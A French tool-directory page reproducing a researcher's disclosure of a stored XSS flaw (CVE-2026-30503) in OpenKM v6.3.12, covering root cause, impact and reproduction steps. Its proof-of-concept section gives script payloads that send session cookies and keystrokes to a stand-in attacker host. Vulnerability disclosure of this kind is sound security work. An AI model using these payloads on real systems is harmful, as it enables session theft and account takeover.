Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

Divulgation détaillée de CVE-2026-30503, une vulnérabilité XSS stockée dans OpenKM v6.3.12. Comprend l'analyse de la cause racine, les charges utiles PoC, l'évaluation de l'impact et les recommandations de correction pour les chercheurs en sécurité et les pentesteurs.

Voir le dépôt
8il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2026-30503 — XSS stocké dans OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Découvert et signalé par Dharmendra Kumar — Chercheur en sécurité

Cybersécurité | Test d'intrusion | Recherche de vulnérabilités | Divulgation responsable


📌 Table des matières

  • Vue d'ensemble
  • Détails CVE
  • Produit concerné
  • Description de la vulnérabilité
  • Analyse de la cause racine
  • Impact et évaluation des risques
  • Preuve de concept (PoC)
  • Correction et recommandations
  • Calendrier de divulgation
  • Références
  • À propos du chercheur

🔍 Vue d'ensemble

Ce dépôt documente la divulgation responsable de CVE-2026-30503, une vulnérabilité de Cross-Site Scripting stocké (XSS stocké) identifiée dans OpenKM v6.3.12 — un système de gestion de documents open-source largement utilisé dans les environnements d'entreprise.

La vulnérabilité permet à un attaquant authentifié d'injecter du JavaScript malveillant persistant dans l'application, qui s'exécute dans le contexte navigateur de tout utilisateur (y compris les administrateurs) qui consulte ultérieurement le contenu affecté.

⚠️ Sévérité : Élevée | Vecteur d'attaque : Réseau | Privilèges requis : Faibles | Interaction utilisateur : Requise


📋 Détails CVE

ChampDétails
Identifiant CVECVE-2026-30503
ProduitOpenKM
Version affectéev6.3.12
Classe de vulnérabilitéCross-Site Scripting stocké (XSS stocké)
CWECWE-79 : Neutralisation incorrecte de l'entrée lors de la génération de pages web
Vecteur CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
ChercheurDharmendra Kumar
Type de divulgationResponsable / Coordonnée

📦 Produit concerné

OpenKM est un système de gestion de documents (DMS) gratuit et open-source qui fournit une interface web pour gérer, auditer et distribuer des documents professionnels. Il est utilisé par des entreprises, des organismes gouvernementaux et des établissements d'enseignement dans le monde entier.

  • Nom du produit : Système de gestion de documents OpenKM
  • Version affectée : v6.3.12
  • Site web du fournisseur : https://www.openkm.com
  • Catégorie : Système de gestion de documents (DMS)
  • Langage/Stack : Java (JSP/Spring)

🧨 Description de la vulnérabilité

De multiples vulnérabilités de Cross-Site Scripting stocké (XSS stocké) ont été découvertes dans OpenKM v6.3.12. Un attaquant disposant d'un accès authentifié à faibles privilèges peut injecter des charges utiles JavaScript arbitraires dans un ou plusieurs champs de saisie. Ces charges utiles sont stockées de manière permanente dans le backend de l'application et exécutées automatiquement dès que tout utilisateur — y compris les administrateurs — accède à la page ou au composant concerné.

Contrairement au XSS réfléchi, qui nécessite que la victime clique sur un lien spécialement conçu, les charges utiles de XSS stocké sont intégrées dans l'application elle-même, ce qui les rend nettement plus dangereuses et persistantes.

Point(s) d'entrée vulnérable(s)

  • Champs de saisie fournis par l'utilisateur dans les métadonnées, notes ou champs de nom des documents
  • L'application ne nettoie ni n'encode les entrées utilisateur avant de les renvoyer au navigateur

🔬 Analyse de la cause racine

La vulnérabilité provient de trois faiblesses combinées dans le pipeline de traitement des entrées de l'application :

User Input ──► [NO Validation] ──► Stored in DB ──► [NO Output Encoding] ──► Rendered in Browser ──► XSS Executed
FaiblesseDescription
❌ Validation d'entrée manquanteL'application ne restreint ni ne nettoie les caractères spéciaux (<, >, ", ', ;) dans les champs fournis par l'utilisateur
❌ Encodage de sortie manquantLes valeurs stockées sont rendues directement dans le HTML sans encodage en entités HTML
❌ Rendu DOM non sécuriséLes données fournies par l'utilisateur sont intégrées dans le contexte DOM sans CSP ni contrôles de nettoyage

💥 Impact et évaluation des risques

Une exploitation réussie de cette vulnérabilité peut entraîner :

RisqueDescription
🍪 Vol de sessionVoler les jetons de session authentifiés via l'exfiltration de document.cookie
👤 Prise de contrôle de compteCompromettre les comptes des victimes, y compris les comptes administrateur
🔐 Capture de mots de passeInjecter des formulaires de phishing pour capturer les identifiants de connexion
📤 Exfiltration de donnéesExtraire silencieusement des documents ou métadonnées sensibles du DMS
⚙️ Actions non autoriséesEffectuer des opérations privilégiées au nom de la victime (supprimer/modifier des documents)
🎯 Ciblage des administrateursLa charge utile s'exécute dans le panneau d'administration lorsqu'un administrateur examine le contenu
🔄 Propagation de verCharge utile XSS auto-réplicative pouvant se propager entre utilisateurs

🧪 Preuve de concept (PoC)

⚠️ Avertissement : Cette PoC est partagée strictement à des fins éducatives et de recherche en sécurité dans le cadre de principes de divulgation responsable. Ne pas utiliser contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de tester.

Exemple de charge utile (générique)

// PoC de base — démontre l'exécution de script
<script>alert('CVE-2026-30503 - XSS by Dharmendra Kumar')</script>

// Exfiltration du jeton de session
<script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>

// Injection de keylogger
<script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>

Étapes pour reproduire

  1. Connectez-vous à OpenKM v6.3.12 avec un compte authentifié à faibles privilèges
  2. Naviguez vers le champ de saisie vulnérable (par exemple, métadonnées de document / notes / champ de titre)
  3. Injectez une charge utile XSS comme <script>alert(document.cookie)</script>
  4. Enregistrez / soumettez l'entrée
  5. Connectez-vous en tant qu'un autre utilisateur (ou administrateur) et naviguez vers la ressource affectée
  6. Observez l'exécution de la charge utile JavaScript dans le contexte navigateur de la victime

🛠️ Correction et recommandations

Pour les développeurs / fournisseurs

Télécharger l’outil